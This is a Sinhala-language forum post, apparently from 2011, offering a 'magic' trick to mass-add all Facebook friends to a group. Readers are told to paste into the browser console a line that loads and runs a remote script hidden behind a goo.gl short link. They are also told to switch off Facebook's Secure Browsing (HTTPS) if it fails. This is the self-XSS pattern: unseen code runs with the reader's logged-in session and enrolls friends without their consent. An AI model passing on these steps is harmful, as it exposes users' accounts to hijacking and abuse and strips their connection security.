Facebook ගෘප් එකට සට සට ගාලා මෙම්බර්ස්ලා ඇඩ් කරගන&#3

sameerakodikara

Active member
  • Jan 6, 2011
    424
    157
    43
    www.aluth.com
    Facebook අයට ටොප් වැඩක් සට සට ගාලා මෙම්බර්ස්ලා .....

    ඔන්න ටොප් වැඩක් ගැන තමා මේ කියන්න යන්නේ....:D...හුරේ....:lol:

    2s9f30o.jpg


    අපි සාමාන්‍යයෙන් ෆේස්බුක් ගෘප් එකකට මෙම්බර්ස්ලා ඇඩ්කරගන්න හෙන කට්ටක් කනවනේ.. ඉතින් අපි එහෙව් කට්ටක් නොකා ජාවා ස්ක්‍රීප්ට් එකකින් ඔබේ මුහුණු පොතේ මිතුරන් ඔක්කෝම එකපාරම ෆේස්බුක් ගෘප් එකට පටස් ගාලා ඇඩ් කොරගන්න පුළුවන්. :yes:

    :angry:
    ඉස්සර නම් ගෲප් වලට තම තමන්ගෙ යාලුවො ඇඩ් කරන්න නම් කොට කොට හෙමින් හෙමින් ඇඩ් කරන්න ඕන. ඒත් දැන් එහෙම නෑ :D. පියවර දෙක තුනකින් වැඩේ කරලා බලාගෙන ඉන්න විතරයි තියෙන්නෙ. සට සට ගාලා මෙම්බර්ස්ලා ඇඩ් වෙන්නෙ...
    අපි බලමු පියවරෙන් පියවර කොහොමද වැඩේ කරන්නෙ කියලා.....;)


    මුලින්ම ඔබට මිතුරන්ව එකතු කරන්න ඔනාකරන ඔබේ Face book Group එකට යන්න.


    • Google Chrome භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..
    1. Group එකේ කොහේ හෝ right click කරන්න.
    2. “Inspect Element” යන්න තෝරා “Console” තෝරන්න.
    3. පහත දී තිබෙන script code එක copy/paste කරන්න.


    HTML:
     document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';
    ඊට පස්සේ Enter key එක ඔබන්න....මද වේලාවක් සිටින්න..:rolleyes:
    ඔන්න සට ගාල වෙනවා පේනවා නේද?:D


    • Mozilla Firefox භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..

    1. CTRL + SHIFT + K යතුරු එකවර ඔබන්න.
    2. පහත දී තිබෙන script code එක copy/paste කරන්න.

    HTML:
     document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';
    ඊට පස්සේ Enter key එක ඔබන්න....මද වේලාවක් සිටින්න..
    කොහොම වැඩේ ගොඩනේ…..





    • කිහිප වාරයක්ම ට්‍රයි කල නමුත් මෙය නිසියාකාරව ක්‍රියාත්මක වෙන්නේ නැහැ. මොකද්ද විසදුම? :confused:

      ඔයාගෙ ෆේස්බුක් ගිණුමෙ Secure Browsing OFF කරන එක. ඒක කරන්න ඔයා Facebook Account Settings >> Security Settings >> Secure Browsing වල ටික් එක ඉවත් කරලා Save කරන්න.:yes:


    • k4toxk.jpg



    එහෙම නම් ඉතින් මේ අපූරු මැජික් එකෙන් ඔබ තෘප්තිමත් නම් ...
    ග්‍රහ මන්දිරේ ආනුබාවයෙන් මා හට බම්ප් එකක් ලබා දෙනු මෑනවී.. :lol:....
     
    Last edited: